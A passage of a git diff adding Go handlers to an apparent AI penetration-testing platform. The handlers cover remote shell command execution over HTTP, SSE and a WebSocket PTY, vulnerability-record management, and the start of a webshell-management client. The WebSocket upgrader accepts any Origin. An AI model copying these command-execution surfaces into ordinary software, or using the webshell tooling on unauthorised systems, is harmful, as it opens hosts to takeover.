+ return trimmed +} + +// NewTerminalHandler 创建终端处理器 +func NewTerminalHandler(logger *zap.Logger) *TerminalHandler { + return &TerminalHandler{logger: logger} +} + +// RunCommandRequest 执行命令请求 +type RunCommandRequest struct { + Command string `json:"command"` + Shell string `json:"shell,omitempty"` + Cwd string `json:"cwd,omitempty"` +} + +// RunCommandResponse 执行命令响应 +type RunCommandResponse struct { + Stdout string `json:"stdout"` + Stderr string `json:"stderr"` + ExitCode int `json:"exit_code"` + Error string `json:"error,omitempty"` +} + +// RunCommand 执行终端命令(需登录) +func (h *TerminalHandler) RunCommand(c *gin.Context) { + var req RunCommandRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "请求体无效,需要 command 字段"}) + return + } + + cmdStr := strings.TrimSpace(req.Command) + if cmdStr == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "command 不能为空"}) + return + } + if len(cmdStr) > terminalMaxCommandLen { + c.JSON(http.StatusBadRequest, gin.H{"error": "命令过长"}) + return + } + + shell := req.Shell + if shell == "" { + if runtime.GOOS == "windows" { + shell = "cmd" + } else { + shell = "sh" + } + } + + ctx, cancel := context.WithTimeout(c.Request.Context(), terminalTimeout) + defer cancel() + + var cmd *exec.Cmd + if runtime.GOOS == "windows" { + cmd = exec.CommandContext(ctx, "cmd", "/c", cmdStr) + } else { + cmd = exec.CommandContext(ctx, shell, "-c", cmdStr) + // 无 TTY 时设置 COLUMNS/TERM,使 ping 等工具的 usage 排版与真实终端一致 + cmd.Env = append(os.Environ(), "COLUMNS=256", "LINES=40", "TERM=xterm-256color") + } + + if req.Cwd != "" { + absCwd, err := filepath.Abs(req.Cwd) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录无效"}) + return + } + cur, _ := os.Getwd() + curAbs, _ := filepath.Abs(cur) + rel, err := filepath.Rel(curAbs, absCwd) + if err != nil || strings.HasPrefix(rel, "..") || rel == ".." { + c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录必须在当前进程目录下"}) + return + } + cmd.Dir = absCwd + } + + var stdout, stderr bytes.Buffer + cmd.Stdout = &stdout + cmd.Stderr = &stderr + + err := cmd.Run() + stdoutBytes := stdout.Bytes() + stderrBytes := stderr.Bytes() + + // 限制输出长度,防止内存占用过大(复制后截断,避免修改原 buffer) + truncSuffix := []byte("\n...(输出已截断)\n") + if len(stdoutBytes) > terminalMaxOutputLen { + tmp := make([]byte, terminalMaxOutputLen+len(truncSuffix)) + n := copy(tmp, stdoutBytes[:terminalMaxOutputLen]) + copy(tmp[n:], truncSuffix) + stdoutBytes = tmp + } + if len(stderrBytes) > terminalMaxOutputLen { + tmp := make([]byte, terminalMaxOutputLen+len(truncSuffix)) + n := copy(tmp, stderrBytes[:terminalMaxOutputLen]) + copy(tmp[n:], truncSuffix) + stderrBytes = tmp + } + + exitCode := 0 + if err != nil { + if exitErr, ok := err.(*exec.ExitError); ok { + exitCode = exitErr.ExitCode() + } else { + exitCode = -1 + } + if ctx.Err() == context.DeadlineExceeded { + so := strings.ReplaceAll(string(stdoutBytes), "\r\n", "\n") + so = strings.ReplaceAll(so, "\r", "\n") + se := strings.ReplaceAll(string(stderrBytes), "\r\n", "\n") + se = strings.ReplaceAll(se, "\r", "\n") + resp := RunCommandResponse{ + Stdout: so, + Stderr: se, + ExitCode: -1, + Error: "命令执行超时(" + terminalTimeout.String() + ")", + } + c.JSON(http.StatusOK, resp) + return + } + h.logger.Debug("终端命令执行异常", zap.String("command", maskTerminalCommand(cmdStr)), zap.Error(err)) + } + + // 统一为 \n,避免前端因 \r 出现错位/对角线排版 + stdoutStr := strings.ReplaceAll(string(stdoutBytes), "\r\n", "\n") + stdoutStr = strings.ReplaceAll(stdoutStr, "\r", "\n") + stderrStr := strings.ReplaceAll(string(stderrBytes), "\r\n", "\n") + stderrStr = strings.ReplaceAll(stderrStr, "\r", "\n") + + resp := RunCommandResponse{ + Stdout: stdoutStr, + Stderr: stderrStr, + ExitCode: exitCode, + } + if err != nil && exitCode != 0 { + resp.Error = err.Error() + } + c.JSON(http.StatusOK, resp) +} + +// streamEvent SSE 事件 +type streamEvent struct { + T string `json:"t"` // "out" | "err" | "exit" + D string `json:"d,omitempty"` + C int `json:"c"` // exit code(不用 omitempty,否则 0 不序列化导致前端显示 [exit undefined]) +} + +// RunCommandStream 流式执行命令,输出实时推送到前端(SSE) +func (h *TerminalHandler) RunCommandStream(c *gin.Context) { + var req RunCommandRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "请求体无效,需要 command 字段"}) + return + } + cmdStr := strings.TrimSpace(req.Command) + if cmdStr == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "command 不能为空"}) + return + } + if len(cmdStr) > terminalMaxCommandLen { + c.JSON(http.StatusBadRequest, gin.H{"error": "命令过长"}) + return + } + shell := req.Shell + if shell == "" { + if runtime.GOOS == "windows" { + shell = "cmd" + } else { + shell = "sh" + } + } + ctx, cancel := context.WithTimeout(c.Request.Context(), terminalTimeout) + defer cancel() + + var cmd *exec.Cmd + if runtime.GOOS == "windows" { + cmd = exec.CommandContext(ctx, "cmd", "/c", cmdStr) + } else { + cmd = exec.CommandContext(ctx, shell, "-c", cmdStr) + cmd.Env = append(os.Environ(), "COLUMNS=256", "LINES=40", "TERM=xterm-256color") + } + if req.Cwd != "" { + absCwd, err := filepath.Abs(req.Cwd) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录无效"}) + return + } + cur, _ := os.Getwd() + curAbs, _ := filepath.Abs(cur) + rel, err := filepath.Rel(curAbs, absCwd) + if err != nil || strings.HasPrefix(rel, "..") || rel == ".." { + c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录必须在当前进程目录下"}) + return + } + cmd.Dir = absCwd + } + + c.Header("Content-Type", "text/event-stream") + c.Header("Cache-Control", "no-cache") + c.Header("Connection", "keep-alive") + c.Header("X-Accel-Buffering", "no") + c.Writer.WriteHeader(http.StatusOK) + flusher, ok := c.Writer.(http.Flusher) + if !ok { + cancel() + return + } + + sendEvent := func(ev streamEvent) { + body, _ := json.Marshal(ev) + c.SSEvent("", string(body)) + flusher.Flush() + } + + _ = runCommandStreamImpl(cmd, sendEvent, ctx) +} diff --git a/internal/handler/terminal_stream_unix.go b/internal/handler/terminal_stream_unix.go new file mode 100644 index 00000000..e8ab8c47 --- /dev/null +++ b/internal/handler/terminal_stream_unix.go @@ -0,0 +1,47 @@ +//go:build !windows + +package handler + +import ( + "bufio" + "context" + "os/exec" + "strings" + + "github.com/creack/pty" +) + +const ptyCols = 256 +const ptyRows = 40 + +// runCommandStreamImpl 在 Unix 下用 PTY 执行,使 ping 等命令按终端宽度排版(isatty 为真) +func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) int { + ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: ptyCols, Rows: ptyRows}) + if err != nil { + sendEvent(streamEvent{T: "exit", C: -1}) + return -1 + } + defer ptmx.Close() + + normalize := func(s string) string { + s = strings.ReplaceAll(s, "\r\n", "\n") + return strings.ReplaceAll(s, "\r", "\n") + } + sc := bufio.NewScanner(ptmx) + for sc.Scan() { + sendEvent(streamEvent{T: "out", D: normalize(sc.Text())}) + } + exitCode := 0 + if err := cmd.Wait(); err != nil { + if exitErr, ok := err.(*exec.ExitError); ok { + exitCode = exitErr.ExitCode() + } else { + exitCode = -1 + } + } + if ctx.Err() == context.DeadlineExceeded { + exitCode = -1 + } + sendEvent(streamEvent{T: "exit", C: exitCode}) + return exitCode +} diff --git a/internal/handler/terminal_stream_windows.go b/internal/handler/terminal_stream_windows.go new file mode 100644 index 00000000..24e430a5 --- /dev/null +++ b/internal/handler/terminal_stream_windows.go @@ -0,0 +1,66 @@ +//go:build windows + +package handler + +import ( + "bufio" + "context" + "os/exec" + "strings" + "sync" +) + +// runCommandStreamImpl 在 Windows 下用 stdout/stderr 管道执行 +func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) int { + stdoutPipe, err := cmd.StdoutPipe() + if err != nil { + sendEvent(streamEvent{T: "exit", C: -1}) + return -1 + } + stderrPipe, err := cmd.StderrPipe() + if err != nil { + sendEvent(streamEvent{T: "exit", C: -1}) + return -1 + } + if err := cmd.Start(); err != nil { + sendEvent(streamEvent{T: "exit", C: -1}) + return -1 + } + + normalize := func(s string) string { + s = strings.ReplaceAll(s, "\r\n", "\n") + return strings.ReplaceAll(s, "\r", "\n") + } + + var wg sync.WaitGroup + wg.Add(2) + go func() { + defer wg.Done() + sc := bufio.NewScanner(stdoutPipe) + for sc.Scan() { + sendEvent(streamEvent{T: "out", D: normalize(sc.Text())}) + } + }() + go func() { + defer wg.Done() + sc := bufio.NewScanner(stderrPipe) + for sc.Scan() { + sendEvent(streamEvent{T: "err", D: normalize(sc.Text())}) + } + }() + + wg.Wait() + exitCode := 0 + if err := cmd.Wait(); err != nil { + if exitErr, ok := err.(*exec.ExitError); ok { + exitCode = exitErr.ExitCode() + } else { + exitCode = -1 + } + } + if ctx.Err() == context.DeadlineExceeded { + exitCode = -1 + } + sendEvent(streamEvent{T: "exit", C: exitCode}) + return exitCode +} diff --git a/internal/handler/terminal_ws_unix.go b/internal/handler/terminal_ws_unix.go new file mode 100644 index 00000000..0f446d83 --- /dev/null +++ b/internal/handler/terminal_ws_unix.go @@ -0,0 +1,111 @@ +//go:build !windows + +package handler + +import ( + "encoding/json" + "net/http" + "os" + "os/exec" + "time" + + "github.com/creack/pty" + "github.com/gin-gonic/gin" + "github.com/gorilla/websocket" +) + +// terminalResize is sent by the frontend when the xterm.js terminal is resized. +type terminalResize struct { + Type string `json:"type"` + Cols uint16 `json:"cols"` + Rows uint16 `json:"rows"` +} + +// wsUpgrader 仅用于系统设置中的终端 WebSocket,会复用已有的登录保护(JWT 中间件在上层路由组) +var wsUpgrader = websocket.Upgrader{ + CheckOrigin: func(r *http.Request) bool { + // 由于已在 Gin 路由层做了认证,这里放宽 Origin,方便在同一域名下通过 HTTPS/WSS 访问 + return true + }, +} + +// RunCommandWS 提供真正交互式 Shell:基于 WebSocket + PTY 的长会话 +// 前端建立 WebSocket 连接后,所有键盘输入都会透传到 Shell,Shell 的输出也会实时写回前端。 +func (h *TerminalHandler) RunCommandWS(c *gin.Context) { + conn, err := wsUpgrader.Upgrade(c.Writer, c.Request, nil) + if err != nil { + return + } + defer conn.Close() + + // 启动交互式 Shell,这里优先使用 bash,找不到则退回 sh + shell := "bash" + if _, err := exec.LookPath(shell); err != nil { + shell = "sh" + } + cmd := exec.Command(shell) + cmd.Env = append(os.Environ(), + "COLUMNS=80", + "LINES=24", + "TERM=xterm-256color", + ) + + // Use 80x24 as a safe default; the frontend will send the actual size immediately after connecting. + ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: 80, Rows: 24}) + if err != nil { + return + } + defer ptmx.Close() + + // Shell -> WebSocket:将 PTY 输出实时发给前端 + doneChan := make(chan struct{}) + go func() { + buf := make([]byte, 4096) + for { + n, err := ptmx.Read(buf) + if n > 0 { + _ = conn.WriteMessage(websocket.BinaryMessage, buf[:n]) + } + if err != nil { + break + } + } + close(doneChan) + }() + + // WebSocket -> Shell:将前端输入写入 PTY(包括 sudo 密码、Ctrl+C 等) + conn.SetReadLimit(64 * 1024) + _ = conn.SetReadDeadline(time.Now().Add(terminalTimeout)) + conn.SetPongHandler(func(string) error { + _ = conn.SetReadDeadline(time.Now().Add(terminalTimeout)) + return nil + }) + + for { + msgType, data, err := conn.ReadMessage() + if err != nil { + _ = cmd.Process.Kill() + break + } + if msgType != websocket.TextMessage && msgType != websocket.BinaryMessage { + continue + } + if len(data) == 0 { + continue + } + // Check if this is a resize message (JSON with type:"resize") + if msgType == websocket.TextMessage && len(data) > 0 && data[0] == '{' { + var resize terminalResize + if json.Unmarshal(data, &resize) == nil && resize.Type == "resize" && resize.Cols > 0 && resize.Rows > 0 { + _ = pty.Setsize(ptmx, &pty.Winsize{Cols: resize.Cols, Rows: resize.Rows}) + continue + } + } + if _, err := ptmx.Write(data); err != nil { + _ = cmd.Process.Kill() + break + } + } + + <-doneChan +} diff --git a/internal/handler/vulnerability.go b/internal/handler/vulnerability.go new file mode 100644 index 00000000..57d84d0b --- /dev/null +++ b/internal/handler/vulnerability.go @@ -0,0 +1,533 @@ +package handler + +import ( + "fmt" + "net/http" + "strconv" + "strings" + "time" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/database" + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// VulnerabilityHandler 漏洞处理器 +type VulnerabilityHandler struct { + db *database.DB + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *VulnerabilityHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewVulnerabilityHandler 创建新的漏洞处理器 +func NewVulnerabilityHandler(db *database.DB, logger *zap.Logger) *VulnerabilityHandler { + return &VulnerabilityHandler{ + db: db, + logger: logger, + } +} + +// CreateVulnerabilityRequest 创建漏洞请求 +type CreateVulnerabilityRequest struct { + ConversationID string `json:"conversation_id" binding:"required"` + ProjectID string `json:"project_id"` + ConversationTag string `json:"conversation_tag"` + TaskTag string `json:"task_tag"` + Title string `json:"title" binding:"required"` + Description string `json:"description"` + Severity string `json:"severity" binding:"required"` + Status string `json:"status"` + Type string `json:"type"` + Target string `json:"target"` + Proof string `json:"proof"` + Impact string `json:"impact"` + Recommendation string `json:"recommendation"` +} + +// CreateVulnerability 创建漏洞 +func (h *VulnerabilityHandler) CreateVulnerability(c *gin.Context) { + var req CreateVulnerabilityRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + vuln := &database.Vulnerability{ + ConversationID: req.ConversationID, + ProjectID: strings.TrimSpace(req.ProjectID), + ConversationTag: req.ConversationTag, + TaskTag: req.TaskTag, + Title: req.Title, + Description: req.Description, + Severity: req.Severity, + Status: req.Status, + Type: req.Type, + Target: req.Target, + Proof: req.Proof, + Impact: req.Impact, + Recommendation: req.Recommendation, + } + + created, err := h.db.CreateVulnerability(vuln) + if err != nil { + h.logger.Error("创建漏洞失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if h.audit != nil { + h.audit.RecordOK(c, "vulnerability", "create", "创建漏洞记录", "vulnerability", created.ID, map[string]interface{}{ + "severity": created.Severity, "title": created.Title, + }) + } + c.JSON(http.StatusOK, created) +} + +// GetVulnerability 获取漏洞 +func (h *VulnerabilityHandler) GetVulnerability(c *gin.Context) { + id := c.Param("id") + + vuln, err := h.db.GetVulnerability(id) + if err != nil { + h.logger.Error("获取漏洞失败", zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": "漏洞不存在"}) + return + } + + c.JSON(http.StatusOK, vuln) +} + +// ListVulnerabilitiesResponse 漏洞列表响应 +type ListVulnerabilitiesResponse struct { + Vulnerabilities []*database.Vulnerability `json:"vulnerabilities"` + Total int `json:"total"` + Page int `json:"page"` + PageSize int `json:"page_size"` + TotalPages int `json:"total_pages"` +} + +func parseVulnerabilityListFilter(c *gin.Context) database.VulnerabilityListFilter { + q := strings.TrimSpace(c.Query("q")) + if q == "" { + q = strings.TrimSpace(c.Query("search")) + } + return database.VulnerabilityListFilter{ + ProjectID: c.Query("project_id"), + ID: c.Query("id"), + Search: q, + ConversationID: c.Query("conversation_id"), + Severity: c.Query("severity"), + Status: c.Query("status"), + TaskID: c.Query("task_id"), + ConversationTag: c.Query("conversation_tag"), + TaskTag: c.Query("task_tag"), + } +} + +// ListVulnerabilities 列出漏洞 +func (h *VulnerabilityHandler) ListVulnerabilities(c *gin.Context) { + limitStr := c.DefaultQuery("limit", "20") + offsetStr := c.DefaultQuery("offset", "0") + pageStr := c.Query("page") + filter := parseVulnerabilityListFilter(c) + + limit, _ := strconv.Atoi(limitStr) + offset, _ := strconv.Atoi(offsetStr) + page := 1 + + // 如果提供了page参数,优先使用page计算offset + if pageStr != "" { + if p, err := strconv.Atoi(pageStr); err == nil && p > 0 { + page = p + offset = (page - 1) * limit + } + } + + if limit <= 0 || limit > 100 { + limit = 20 + } + if offset < 0 { + offset = 0 + } + + // 获取总数 + total, err := h.db.CountVulnerabilities(filter) + if err != nil { + h.logger.Error("获取漏洞总数失败", zap.Error(err)) + // 继续执行,使用0作为总数 + total = 0 + } + + // 获取漏洞列表 + vulnerabilities, err := h.db.ListVulnerabilities(limit, offset, filter) + if err != nil { + h.logger.Error("获取漏洞列表失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 计算总页数 + totalPages := (total + limit - 1) / limit + if totalPages == 0 { + totalPages = 1 + } + + // 如果使用offset计算page,需要重新计算 + if pageStr == "" { + page = (offset / limit) + 1 + } + + response := ListVulnerabilitiesResponse{ + Vulnerabilities: vulnerabilities, + Total: total, + Page: page, + PageSize: limit, + TotalPages: totalPages, + } + + c.JSON(http.StatusOK, response) +} + +// UpdateVulnerabilityRequest 更新漏洞请求 +type UpdateVulnerabilityRequest struct { + ProjectID *string `json:"project_id"` + ConversationTag string `json:"conversation_tag"` + TaskTag string `json:"task_tag"` + Title string `json:"title"` + Description string `json:"description"` + Severity string `json:"severity"` + Status string `json:"status"` + Type string `json:"type"` + Target string `json:"target"` + Proof string `json:"proof"` + Impact string `json:"impact"` + Recommendation string `json:"recommendation"` +} + +// UpdateVulnerability 更新漏洞 +func (h *VulnerabilityHandler) UpdateVulnerability(c *gin.Context) { + id := c.Param("id") + + var req UpdateVulnerabilityRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // 获取现有漏洞 + existing, err := h.db.GetVulnerability(id) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "漏洞不存在"}) + return + } + + // 更新字段 + if req.ProjectID != nil { + existing.ProjectID = strings.TrimSpace(*req.ProjectID) + } + if req.ConversationTag != "" { + existing.ConversationTag = req.ConversationTag + } + if req.TaskTag != "" { + existing.TaskTag = req.TaskTag + } + if req.Title != "" { + existing.Title = req.Title + } + if req.Description != "" { + existing.Description = req.Description + } + if req.Severity != "" { + existing.Severity = req.Severity + } + if req.Status != "" { + existing.Status = req.Status + } + if req.Type != "" { + existing.Type = req.Type + } + if req.Target != "" { + existing.Target = req.Target + } + if req.Proof != "" { + existing.Proof = req.Proof + } + if req.Impact != "" { + existing.Impact = req.Impact + } + if req.Recommendation != "" { + existing.Recommendation = req.Recommendation + } + + if err := h.db.UpdateVulnerability(id, existing); err != nil { + h.logger.Error("更新漏洞失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 返回更新后的漏洞 + updated, err := h.db.GetVulnerability(id) + if err != nil { + h.logger.Error("获取更新后的漏洞失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if h.audit != nil { + h.audit.RecordOK(c, "vulnerability", "update", "更新漏洞记录", "vulnerability", id, map[string]interface{}{ + "severity": updated.Severity, "status": updated.Status, "project_id": updated.ProjectID, + }) + } + c.JSON(http.StatusOK, updated) +} + +// DeleteVulnerability 删除漏洞 +func (h *VulnerabilityHandler) DeleteVulnerability(c *gin.Context) { + id := c.Param("id") + + if err := h.db.DeleteVulnerability(id); err != nil { + h.logger.Error("删除漏洞失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "vulnerability", + Action: "delete", + Result: "success", + ResourceType: "vulnerability", + ResourceID: id, + Message: "删除漏洞记录", + }) + } + + c.JSON(http.StatusOK, gin.H{"message": "删除成功"}) +} + +// BatchDeleteVulnerabilities 按当前筛选条件批量删除漏洞 +func (h *VulnerabilityHandler) BatchDeleteVulnerabilities(c *gin.Context) { + filter := parseVulnerabilityListFilter(c) + + total, err := h.db.CountVulnerabilities(filter) + if err != nil { + h.logger.Error("统计待删除漏洞失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if total == 0 { + c.JSON(http.StatusOK, gin.H{"message": "当前筛选条件下没有可删除的漏洞", "deleted": 0}) + return + } + + deleted, err := h.db.DeleteVulnerabilitiesByFilter(filter) + if err != nil { + h.logger.Error("批量删除漏洞失败", zap.Error(err), zap.Int("count", total)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if h.audit != nil { + h.audit.RecordOK(c, "vulnerability", "delete_batch", "批量删除漏洞记录", "vulnerability", "", map[string]interface{}{ + "deleted": deleted, + "filter": filter, + }) + } + + c.JSON(http.StatusOK, gin.H{"message": "批量删除成功", "deleted": deleted}) +} + +// GetVulnerabilityStats 获取漏洞统计 +func (h *VulnerabilityHandler) GetVulnerabilityStats(c *gin.Context) { + filter := parseVulnerabilityListFilter(c) + + stats, err := h.db.GetVulnerabilityStats(filter) + if err != nil { + h.logger.Error("获取漏洞统计失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, stats) +} + +// GetVulnerabilityFilterOptions 获取漏洞筛选建议项 +func (h *VulnerabilityHandler) GetVulnerabilityFilterOptions(c *gin.Context) { + options, err := h.db.GetVulnerabilityFilterOptions() + if err != nil { + h.logger.Error("获取漏洞筛选建议失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, options) +} + +// ExportVulnerabilities 导出漏洞(支持按对话/任务分组,汇总或拆分) +func (h *VulnerabilityHandler) ExportVulnerabilities(c *gin.Context) { + groupBy := c.DefaultQuery("group_by", "conversation") + mode := c.DefaultQuery("mode", "summary") + if groupBy != "conversation" && groupBy != "task" { + c.JSON(http.StatusBadRequest, gin.H{"error": "group_by 仅支持 conversation 或 task"}) + return + } + if mode != "summary" && mode != "split" { + c.JSON(http.StatusBadRequest, gin.H{"error": "mode 仅支持 summary 或 split"}) + return + } + + filter := parseVulnerabilityListFilter(c) + + total, err := h.db.CountVulnerabilities(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if total == 0 { + c.JSON(http.StatusOK, gin.H{"mode": mode, "group_by": groupBy, "total": 0, "files": []any{}}) + return + } + + items, err := h.db.ListVulnerabilities(total, 0, filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + type exportFile struct { + FileName string `json:"filename"` + Content string `json:"content"` + } + grouped := map[string][]*database.Vulnerability{} + for _, v := range items { + key := v.ConversationID + if groupBy == "conversation" { + if strings.TrimSpace(v.ConversationTag) != "" { + key = strings.TrimSpace(v.ConversationTag) + } + } else { + key = firstNonEmpty(v.TaskTag, v.TaskID, v.TaskQueueID, "unassigned-task") + } + grouped[key] = append(grouped[key], v) + } + + files := make([]exportFile, 0) + nowStr := time.Now().Format("20060102-150405") + if mode == "summary" { + var b strings.Builder + b.WriteString("# 漏洞批量导出报告\n\n") + b.WriteString(fmt.Sprintf("- 导出时间: %s\n", time.Now().Format("2006-01-02 15:04:05"))) + b.WriteString(fmt.Sprintf("- 分组维度: %s\n", groupBy)) + b.WriteString(fmt.Sprintf("- 漏洞总数: %d\n", len(items))) + b.WriteString(fmt.Sprintf("- 分组数: %d\n\n", len(grouped))) + for group, list := range grouped { + b.WriteString(fmt.Sprintf("## %s (%d)\n\n", group, len(list))) + for _, v := range list { + appendVulnerabilityMarkdown(&b, v, "###") + } + } + files = append(files, exportFile{ + FileName: fmt.Sprintf("vulnerability-report-%s-%s.md", groupBy, nowStr), + Content: b.String(), + }) + } else { + for group, list := range grouped { + var b strings.Builder + b.WriteString(fmt.Sprintf("# 漏洞报告 - %s\n\n", group)) + b.WriteString(fmt.Sprintf("- 导出时间: %s\n", time.Now().Format("2006-01-02 15:04:05"))) + b.WriteString(fmt.Sprintf("- 漏洞数量: %d\n\n", len(list))) + for _, v := range list { + appendVulnerabilityMarkdown(&b, v, "##") + } + files = append(files, exportFile{ + FileName: fmt.Sprintf("vulnerability-%s-%s.md", sanitizeExportName(group), nowStr), + Content: b.String(), + }) + } + } + + c.JSON(http.StatusOK, gin.H{ + "mode": mode, + "group_by": groupBy, + "total": len(items), + "files": files, + }) +} + +// appendVulnerabilityMarkdown 单条漏洞的 Markdown 片段(与单文件下载字段对齐,缺省字段不写) +func appendVulnerabilityMarkdown(b *strings.Builder, v *database.Vulnerability, titleHeading string) { + b.WriteString(fmt.Sprintf("%s %s\n\n", titleHeading, v.Title)) + b.WriteString(fmt.Sprintf("- 漏洞ID: `%s`\n", v.ID)) + b.WriteString(fmt.Sprintf("- 严重程度: %s\n", v.Severity)) + b.WriteString(fmt.Sprintf("- 状态: %s\n", v.Status)) + if v.Type != "" { + b.WriteString(fmt.Sprintf("- 类型: %s\n", v.Type)) + } + if v.Target != "" { + b.WriteString(fmt.Sprintf("- 目标: %s\n", v.Target)) + } + b.WriteString(fmt.Sprintf("- 对话ID: `%s`\n", v.ConversationID)) + if v.ConversationTag != "" { + b.WriteString(fmt.Sprintf("- 对话标签: %s\n", v.ConversationTag)) + } + if v.TaskTag != "" { + b.WriteString(fmt.Sprintf("- 任务标签: %s\n", v.TaskTag)) + } + if v.TaskID != "" { + b.WriteString(fmt.Sprintf("- 任务ID: `%s`\n", v.TaskID)) + } + if v.TaskQueueID != "" { + b.WriteString(fmt.Sprintf("- 任务队列ID: `%s`\n", v.TaskQueueID)) + } + if !v.CreatedAt.IsZero() { + b.WriteString(fmt.Sprintf("- 创建时间: %s\n", v.CreatedAt.Format("2006-01-02 15:04:05"))) + } + if !v.UpdatedAt.IsZero() { + b.WriteString(fmt.Sprintf("- 更新时间: %s\n", v.UpdatedAt.Format("2006-01-02 15:04:05"))) + } + if v.Description != "" { + b.WriteString("\n#### 描述\n\n") + b.WriteString(v.Description) + b.WriteString("\n") + } + if v.Proof != "" { + b.WriteString("\n#### 证明(POC)\n\n```\n") + b.WriteString(v.Proof) + b.WriteString("\n```\n") + } + if v.Impact != "" { + b.WriteString("\n#### 影响\n\n") + b.WriteString(v.Impact) + b.WriteString("\n") + } + if v.Recommendation != "" { + b.WriteString("\n#### 修复建议\n\n") + b.WriteString(v.Recommendation) + b.WriteString("\n") + } + b.WriteString("\n") +} + +func firstNonEmpty(values ...string) string { + for _, v := range values { + trimmed := strings.TrimSpace(v) + if trimmed != "" { + return trimmed + } + } + return "" +} + +func sanitizeExportName(raw string) string { + name := strings.TrimSpace(raw) + if name == "" { + return "unknown" + } + replacer := strings.NewReplacer("/", "-", "\\", "-", ":", "-", "*", "-", "?", "-", "\"", "-", "<", "-", ">", "-", "|", "-") + return replacer.Replace(name) +} diff --git a/internal/handler/webshell.go b/internal/handler/webshell.go new file mode 100644 index 00000000..87e5b5b1 --- /dev/null +++ b/internal/handler/webshell.go @@ -0,0 +1,993 @@ +package handler + +import ( + "bytes" + "crypto/tls" + "database/sql" + "encoding/base64" + "encoding/json" + "io" + "net/http" + "net/url" + "strings" + "time" + "unicode/utf8" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "github.com/google/uuid" + "go.uber.org/zap" + "golang.org/x/text/encoding/simplifiedchinese" + "golang.org/x/text/transform" +) + +// webshellSupportedEncodings 允许的 WebShell 响应编码取值(小写,含空串代表 auto) +// 仅暴露目前最常见的几种,其他需求可后续扩展(如 Big5、Shift_JIS 等)。 +var webshellSupportedEncodings = map[string]struct{}{ + "": {}, // 未配置,按 auto 处理 + "auto": {}, + "utf-8": {}, + "utf8": {}, + "gbk": {}, + "gb18030": {}, +} + +// normalizeWebshellEncoding 归一化编码标识:统一为小写,未知值回退为 auto,供持久化使用 +func normalizeWebshellEncoding(enc string) string { + enc = strings.ToLower(strings.TrimSpace(enc)) + if _, ok := webshellSupportedEncodings[enc]; !ok { + return "auto" + } + if enc == "" { + return "auto" + } + if enc == "utf8" { + return "utf-8" + } + return enc +} + +// decodeWebshellOutput 把 WebShell 返回的字节按指定编码转换为合法 UTF-8 字符串。 +// 约定: +// - "" / "auto":若已是合法 UTF-8 原样返回,否则依次尝试 GB18030(GBK 超集)解码。 +// - "utf-8" / "utf8":原样返回,非法字节交由 JSON 层按 U+FFFD 处理(保持原有行为)。 +// - "gbk" / "gb18030":强制按对应编码解码;失败则回退原始字节。 +// +// 该函数对空输入直接返回空串,避免不必要的转换。 +func decodeWebshellOutput(raw []byte, encoding string) string { + if len(raw) == 0 { + return "" + } + enc := normalizeWebshellEncoding(encoding) + switch enc { + case "utf-8": + return string(raw) + case "gbk": + if out, _, err := transform.Bytes(simplifiedchinese.GBK.NewDecoder(), raw); err == nil { + return string(out) + } + return string(raw) + case "gb18030": + if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil { + return string(out) + } + return string(raw) + default: // auto + if utf8.Valid(raw) { + return string(raw) + } + // GB18030 是 GBK 的超集,覆盖范围最广,auto 模式统一用它兜底 + if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil { + return string(out) + } + return string(raw) + } +} + +// webshellSupportedOS 允许的 WebShell 目标操作系统(小写,空串代表 auto) +var webshellSupportedOS = map[string]struct{}{ + "": {}, + "auto": {}, + "linux": {}, + "windows": {}, +} + +// normalizeWebshellOS 归一化 OS 标识,未知值回退为 auto,供持久化使用 +func normalizeWebshellOS(osTag string) string { + osTag = strings.ToLower(strings.TrimSpace(osTag)) + if _, ok := 